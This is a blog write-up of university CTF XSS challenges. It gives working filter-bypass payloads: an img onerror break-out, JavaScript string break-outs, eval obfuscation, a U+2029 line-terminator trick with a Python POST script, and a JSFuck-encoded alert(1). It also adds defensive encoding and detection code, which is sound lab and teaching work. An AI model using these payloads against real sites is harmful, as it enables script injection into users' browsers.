H4rdy's blogs - Southwest Petroleum University CTF XSS challenges

xss_1

The most commonly used script tag is filtered, so switch to img instead.

"><img src=1 onerror=alert(1)>

xss_2

Looking at the output point, first close the if statement, then close what comes after it :)

Construct the payload:

1");alert(1);("

xss_3

A bit like the second one.

'');var a='String.fro'; var b='mCharC'; var c='ode(97, 108, 101, 114, 116, 40, 49, 41)'; var d=a+b+c; eval(eval(d));(''
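All three payloads above work by ending the context the input is reflected into (a double-quoted HTML attribute in xss_1, a JavaScript string literal inside if("...") in xss_2 and xss_3) and starting a new one. The fix on the server side is to encode for the exact context, so the closing quote can never be produced. The following is an added example, not code from the original write-up or from the challenge site: the payload constants are copied from this page, and the function names, the render templates, and the whitelist of characters left unescaped are my own choices.

```python
import html

# Sample inputs: the break-out payloads shown in the write-up (constructed copies).
ATTR_BREAKOUT = '"><img src=1 onerror=alert(1)>'          # xss_1: closes the attribute value, adds a tag
JS_DQ_BREAKOUT = '1");alert(1);("'                        # xss_2: closes if("..."), injects a statement
JS_SQ_BREAKOUT = ("'');var a='String.fro'; var b='mCharC'; "
                  "var c='ode(97, 108, 101, 114, 116, 40, 49, 41)'; "
                  "var d=a+b+c; eval(eval(d));(''")       # xss_3: same idea with single quotes


def attr_encode(value):
    """Encode untrusted text for a quoted HTML attribute value (& < > " ' become entities)."""
    return html.escape(value, quote=True)


def js_string_encode(value):
    """Encode untrusted text for a JavaScript string literal inside <script>.

    Everything except ASCII letters, digits, space, comma and period becomes a
    \\uXXXX escape. Quotes, parentheses and semicolons can therefore never end
    the literal early, and the JS line terminators U+2028/U+2029 (which a
    newline-only filter misses) are escaped as well.
    """
    out = []
    for ch in value:
        cp = ord(ch)
        if cp < 128 and (ch.isalnum() or ch in " ,."):
            out.append(ch)
        elif cp > 0xFFFF:
            # Astral characters must be written as a UTF-16 surrogate pair in \u form.
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 | (cp >> 10), 0xDC00 | (cp & 0x3FF)))
        else:
            out.append("\\u%04x" % cp)
    return "".join(out)


def render_attribute(value):
    """Reflect user input into a double-quoted attribute, as the xss_1 page does."""
    return '<input type="text" name="data" value="%s">' % attr_encode(value)


def render_script(value, quote='"'):
    """Reflect user input into a JS string literal, as the xss_2/xss_3 pages do."""
    return "<script>if(%s%s%s){}</script>" % (quote, js_string_encode(value), quote)


if __name__ == "__main__":
    print(render_attribute(ATTR_BREAKOUT))
    print(render_script(JS_DQ_BREAKOUT))
    print(render_script(JS_SQ_BREAKOUT, quote="'"))
```

With attribute encoding the leading `"` of the xss_1 payload is emitted as `&quot;` and stays inside the value; with \u-escaping, the `"` of xss_2 is `\u0022` and the `'` of xss_3 is `\u0027`, so the literal is never closed. Note that in engines before ES2019 a raw U+2028/U+2029 inside a string literal is a syntax error, and in every engine it still terminates a `//` comment, which is why the encoder escapes those two characters along with the ASCII newlines rather than relying on a newline filter.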

xss_4

Thanks to fyth.

In the group, a friend solved it and then posted the payload:

document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)

Run it in the console: it writes the 0x2029 newline/carriage-return character into data, then submit.

Capturing the request during submission makes it clearer:

data=%E2%80%A9eval%28%27al%27%2B%27ert%27%29%281%29%3B%E2%80%A9

The leading %E2%80%A9 is the carriage return. Once the submission succeeds, it pops alert(1).

Thoughts:

document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)

0x1

A carriage-return/line-break character is written at both the beginning and the end;

removing the trailing one still successfully triggers alert(1).

0x2

A Baidu search shows that 0x2029 is a carriage return, or paragraph separator,

so 0x2028 is a new line, or line separator.

Replacing 0x2029 with 0x2028 still works.

0x3

Captured while submitting:

data=%E2%80%A9

When the request is sent, intercept it with Burp and change the POST data's hex to E2 80 A9; that also produces the line break successfully.

0x4

Written in Python:

#!/usr/bin/env python
import requests

# Send the payload wrapped in U+2029 (PARAGRAPH SEPARATOR); requests
# form-encodes it as %E2%80%A9, the same bytes seen in the captured request.
resp = requests.post("http://xss.swpuwllm.com/xss_4/",
                     data={'data': u"\u2029eval('al'+'ert')(1)"})
print(resp.text)  # the decoded response body (works on Python 2 and 3)

You can see the returned page.

0x5

A bit of fuzzing shows that letters are filtered, but characters like {}!+ are not. I immediately thought of jother encoding, but it didn't work; switching to JSFuck encoding and submitting the encoded alert(1) succeeded. Is there a difference between jother and JSFuck? alert(1) encoded with JSFuck has fewer characters than with jother; why?

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
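Two detection points follow from the observations above. For xss_4 (0x2 and 0x3): U+2028 and U+2029 are line terminators to a JavaScript parser, but a filter that only looks for \r and \n never sees them, and in the request body they are just the UTF-8 bytes E2 80 A8 / E2 80 A9. For xss_5: JSFuck ([]()!+) and jother (adding {}) produce payloads that contain no letters at all, which is an unusual shape for form input. The following inspector is an added example, not code from the write-up or from the challenge site: the sample bodies are constructed (the first mirrors the capture shown on this page), and the function names, finding labels, and the length/ratio thresholds are my own assumptions.

```python
import re
from urllib.parse import quote, unquote_plus

# ECMA-262 LineTerminator set: LF, CR, LINE SEPARATOR (U+2028), PARAGRAPH SEPARATOR (U+2029).
JS_LINE_TERMINATORS = "\n\r\u2028\u2029"
NAIVE_NEWLINE = re.compile(r"[\r\n]")                     # what a typical "strip newlines" filter checks
JS_NEWLINE = re.compile("[%s]" % JS_LINE_TERMINATORS)     # what the browser's JS parser treats as a line end

# Characters from which JSFuck ([]()!+) and jother (adds {}) build arbitrary JavaScript.
SYMBOL_ALPHABET = set("[]()!+{}")


def utf8_hex(ch):
    """Hex bytes of a character's UTF-8 form, as shown in a proxy's hex editor (e.g. 'E2 80 A9')."""
    return " ".join("%02X" % b for b in ch.encode("utf-8"))


def parse_form_body(raw):
    """Decode an application/x-www-form-urlencoded body into {field: str}."""
    fields = {}
    for pair in raw.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)   # %E2%80%A9 -> U+2029 via UTF-8
    return fields


def symbol_only_ratio(s):
    """Fraction of characters drawn from the JSFuck/jother alphabet, 0.0 for empty input."""
    return sum(c in SYMBOL_ALPHABET for c in s) / len(s) if s else 0.0


def inspect_form_body(raw, min_len=16, threshold=0.95):
    """Return sorted (field, finding) pairs for one raw form body.

    'unicode-line-terminator': a JS line terminator that a [\\r\\n] filter would miss.
    'ascii-newline':           a plain \\r or \\n in the value.
    'symbol-only-js':          long value made almost entirely of []()!+{} (assumed thresholds).
    """
    findings = []
    for name, value in parse_form_body(raw).items():
        if JS_NEWLINE.search(value):
            if NAIVE_NEWLINE.search(value):
                findings.append((name, "ascii-newline"))
            else:
                findings.append((name, "unicode-line-terminator"))
        if len(value) >= min_len and symbol_only_ratio(value) >= threshold:
            findings.append((name, "symbol-only-js"))
    return sorted(findings)


# Constructed sample bodies; "ps_wrapped" mirrors the capture in the write-up.
SAMPLES = {
    "ps_wrapped": "data=%E2%80%A9eval%28%27al%27%2B%27ert%27%29%281%29%3B%E2%80%A9",
    "ls_wrapped": "data=%E2%80%A8eval%281%29",
    "lf_only":    "data=a%0Ab",
    "jsfuck":     "data=" + quote("[][(![]+[])[+[]]]"),   # a JSFuck-shaped fragment, URL-encoded
    "benign":     "data=hello+world&x=1",
}

if __name__ == "__main__":
    print("U+2029 on the wire:", utf8_hex("\u2029"))
    for label, body in SAMPLES.items():
        print(label, inspect_form_body(body))
```

The ratio check is deliberately a heuristic, not a parser: it flags the shape of the input so a reviewer can look at it, and the thresholds should be tuned against real traffic. One more caveat for anyone writing such filters in Python: `str.splitlines()` already treats U+2028 and U+2029 (and several other control characters) as line boundaries, while a `[\r\n]` regex does not, so two "newline" checks in the same code base can disagree about the very input used in xss_4.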

© H4rdy's blog